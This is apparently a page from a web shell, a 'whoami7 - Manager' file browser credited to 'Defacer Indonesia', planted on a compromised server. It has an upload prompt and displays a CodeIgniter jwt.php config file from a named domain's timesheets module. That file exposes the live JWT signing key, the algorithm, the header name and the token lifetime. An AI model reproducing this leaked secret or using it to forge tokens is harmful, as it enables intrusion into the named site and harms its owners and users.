whoami7 - Manager
:
/
home
/
kckglobal
/
cloud.kckglobal.net
/
modules
/
timesheets
/
config
/
Upload File:
files >> /home/kckglobal/cloud.kckglobal.net/modules/timesheets/config/jwt.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); /* |-------------------- | JWT Secure Key |-------------------------------------------------------------------------- */ $config['jwt_key'] = 'eyJ0eXAiOiJKV1QiLCJhbGciTWvLUzI1NiJ9IiRkYXRhIg'; /* |----------------------- | JWT Algorithm Type |-------------------------------------------------------------------------- */ $config['jwt_algorithm'] = 'HS256'; /* |----------------------- | Token Request Header Name |-------------------------------------------------------------------------- */ $config['token_header'] = 'authtoken'; /* |----------------------- | Token Expire Time | https://www.tools4noobs.com/online_tools/hh_mm_ss_to_seconds/ |-------------------------------------------------------------------------- | ( 1 Day ) : 60 * 60 * 24 = 86400 | ( 1 Hour ) : 60 * 60 = 3600 | ( 1 Minute ) : 60 = 60 */ $config['token_expire_time'] = 900000;
Copyright ©2021 || Defacer Indonesia